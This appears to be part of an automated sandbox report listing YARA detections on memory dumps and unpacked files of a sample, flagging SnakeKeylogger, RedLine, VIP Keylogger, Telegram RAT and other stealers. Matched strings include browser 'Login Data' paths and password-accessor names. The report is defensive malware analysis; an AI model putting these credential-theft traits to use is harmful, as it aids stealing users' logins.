0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f76a:$a1: get_encryptedPassword 0x3f73e:$a2: get_encryptedUsername 0x3f802:$a3: get_timePasswordChanged 0x3f71a:$a4: get_passwordField 0x3f780:$a5: set_encryptedPassword 0x3f54d:$a7: get_logins 0x3ab9a:$a10: KeyLoggerEventArgs 0x3ab69:$a11: KeyLoggerEventArgsEventHandler 0x3f621:$a13: _encryptedPassword
0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a86e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49f11:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a16e:$a4: \Orbitum\User Data\Default\Login Data 0x4ab4d:$a5: \Kometa\User Data\Default\Login Data
0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d312:$s1: UnHook 0x3d2ae:$s2: SetHook 0x3d2e7:$s3: CallNextHook 0x3d276:$s4: _hook
0000000C.00000001.2208904113.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f52a:$a1: get_encryptedPassword 0x3f4fe:$a2: get_encryptedUsername 0x3f5c2:$a3: get_timePasswordChanged 0x3f4da:$a4: get_passwordField 0x3f540:$a5: set_encryptedPassword 0x3f30d:$a7: get_logins 0x3a95a:$a10: KeyLoggerEventArgs 0x3a929:$a11: KeyLoggerEventArgsEventHandler 0x3f3e1:$a13: _encryptedPassword
00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f76a:$a1: get_encryptedPassword 0x3f73e:$a2: get_encryptedUsername 0x3f802:$a3: get_timePasswordChanged 0x3f71a:$a4: get_passwordField 0x3f780:$a5: set_encryptedPassword 0x3f54d:$a7: get_logins 0x3ab9a:$a10: KeyLoggerEventArgs 0x3ab69:$a11: KeyLoggerEventArgsEventHandler 0x3f621:$a13: _encryptedPassword
00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a86e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49f11:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a16e:$a4: \Orbitum\User Data\Default\Login Data 0x4ab4d:$a5: \Kometa\User Data\Default\Login Data
00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d312:$s1: UnHook 0x3d2ae:$s2: SetHook 0x3d2e7:$s3: CallNextHook 0x3d276:$s4: _hook
00000010.00000002.3446431807.000000001B4F5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.3446431807.000000001B4F5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
00000014.00000002.3444524206.000000002A3C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: jphwmyiA.pif PID: 6396	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: jphwmyiA.pif PID: 6396	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: jphwmyiA.pif PID: 6396	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: jphwmyiA.pif PID: 6396	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: jphwmyiA.pif PID: 6396	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1cbcc4:$a1: get_encryptedPassword 0x1e1365:$a1: get_encryptedPassword 0x26f881:$a1: get_encryptedPassword 0x2b0a0e:$a1: get_encryptedPassword 0x1cbc98:$a2: get_encryptedUsername 0x1e1339:$a2: get_encryptedUsername 0x26f855:$a2: get_encryptedUsername 0x2b09e2:$a2: get_encryptedUsername 0x1cbd5c:$a3: get_timePasswordChanged 0x1e13fd:$a3: get_timePasswordChanged 0x26f919:$a3: get_timePasswordChanged 0x2b0aa6:$a3: get_timePasswordChanged 0x1cbc74:$a4: get_passwordField 0x1e1315:$a4: get_passwordField 0x26f831:$a4: get_passwordField 0x2b09be:$a4: get_passwordField 0x1cbcda:$a5: set_encryptedPassword 0x1e137b:$a5: set_encryptedPassword 0x26f897:$a5: set_encryptedPassword 0x2b0a24:$a5: set_encryptedPassword 0x1cbab0:$a7: get_logins
Process Memory Space: jphwmyiA.pif PID: 2228	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: jphwmyiA.pif PID: 2228	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: jphwmyiA.pif PID: 2228	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: jphwmyiA.pif PID: 2228	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: jphwmyiA.pif PID: 2228	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x5ae00:$a1: get_encryptedPassword 0xd8d4a:$a1: get_encryptedPassword 0xf4421:$a1: get_encryptedPassword 0x10e5e5:$a1: get_encryptedPassword 0x5add4:$a2: get_encryptedUsername 0xd8d1e:$a2: get_encryptedUsername 0xf43f5:$a2: get_encryptedUsername 0x10e5b9:$a2: get_encryptedUsername 0x5ae98:$a3: get_timePasswordChanged 0xd8de2:$a3: get_timePasswordChanged 0xf44b9:$a3: get_timePasswordChanged 0x10e67d:$a3: get_timePasswordChanged 0x5adb0:$a4: get_passwordField 0xd8cfa:$a4: get_passwordField 0xf43d1:$a4: get_passwordField 0x10e595:$a4: get_passwordField 0x5ae16:$a5: set_encryptedPassword 0xd8d60:$a5: set_encryptedPassword 0xf4437:$a5: set_encryptedPassword 0x10e5fb:$a5: set_encryptedPassword 0x5abec:$a7: get_logins
Process Memory Space: jphwmyiA.pif PID: 5476	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: jphwmyiA.pif PID: 5476	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: jphwmyiA.pif PID: 5476	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: jphwmyiA.pif PID: 5476	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: jphwmyiA.pif PID: 5476	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x65226:$a1: get_encryptedPassword 0xa081f:$a1: get_encryptedPassword 0x137eca:$a1: get_encryptedPassword 0x2b755c:$a1: get_encryptedPassword 0x651fa:$a2: get_encryptedUsername 0xa07f3:$a2: get_encryptedUsername 0x137e9e:$a2: get_encryptedUsername 0x2b7530:$a2: get_encryptedUsername 0x652be:$a3: get_timePasswordChanged 0xa08b7:$a3: get_timePasswordChanged 0x137f62:$a3: get_timePasswordChanged 0x2b75f4:$a3: get_timePasswordChanged 0x651d6:$a4: get_passwordField 0xa07cf:$a4: get_passwordField 0x137e7a:$a4: get_passwordField 0x2b750c:$a4: get_passwordField 0x6523c:$a5: set_encryptedPassword 0xa0835:$a5: set_encryptedPassword 0x137ee0:$a5: set_encryptedPassword 0x2b7572:$a5: set_encryptedPassword 0x65012:$a7: get_logins
Click to see the 117 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
20.2.jphwmyiA.pif.400000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
13.2.Aiymwhpj.PIF.211f67a8.6.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1bcb0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x38cb0:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x39330:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1d98a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1d5d0:$s5: delete[] 0x1ca88:$s6: constructor or from DllMain.
20.2.jphwmyiA.pif.400000.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
20.1.jphwmyiA.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
16.1.jphwmyiA.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
20.1.jphwmyiA.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
12.2.jphwmyiA.pif.25f2a8c6.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.jphwmyiA.pif.25f2a8c6.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
12.2.jphwmyiA.pif.25f2a8c6.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.2.jphwmyiA.pif.25f2a8c6.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.jphwmyiA.pif.25f2a8c6.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.jphwmyiA.pif.25f2a8c6.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
12.2.jphwmyiA.pif.25f2a8c6.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
12.2.jphwmyiA.pif.25f2a8c6.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
16.2.jphwmyiA.pif.1d140000.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.jphwmyiA.pif.1d140000.6.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
16.2.jphwmyiA.pif.1d140000.6.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.jphwmyiA.pif.1d140000.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.jphwmyiA.pif.1d140000.6.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
16.2.jphwmyiA.pif.1d140000.6.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
16.2.jphwmyiA.pif.1d140000.6.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
20.3.jphwmyiA.pif.283edba0.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
20.3.jphwmyiA.pif.283edba0.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
20.3.jphwmyiA.pif.283edba0.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
20.3.jphwmyiA.pif.283edba0.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
20.3.jphwmyiA.pif.283edba0.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
20.3.jphwmyiA.pif.283edba0.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
20.3.jphwmyiA.pif.283edba0.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
12.3.jphwmyiA.pif.24507b80.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.3.jphwmyiA.pif.24507b80.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.3.jphwmyiA.pif.24507b80.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.3.jphwmyiA.pif.24507b80.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.3.jphwmyiA.pif.24507b80.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
12.3.jphwmyiA.pif.24507b80.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
12.3.jphwmyiA.pif.24507b80.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
16.2.jphwmyiA.pif.1d140000.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.jphwmyiA.pif.1d140000.6.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
16.2.jphwmyiA.pif.1d140000.6.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
16.2.jphwmyiA.pif.1d140000.6.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.jphwmyiA.pif.1d140000.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.jphwmyiA.pif.1d140000.6.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
16.2.jphwmyiA.pif.1d140000.6.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
16.2.jphwmyiA.pif.1d140000.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
12.2.jphwmyiA.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
8.2.brightness.exe.22c65a8.1.raw.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
12.2.jphwmyiA.pif.25f299de.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.jphwmyiA.pif.25f299de.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
12.2.jphwmyiA.pif.25f299de.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.2.jphwmyiA.pif.25f299de.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.jphwmyiA.pif.25f299de.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.jphwmyiA.pif.1cb10000.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
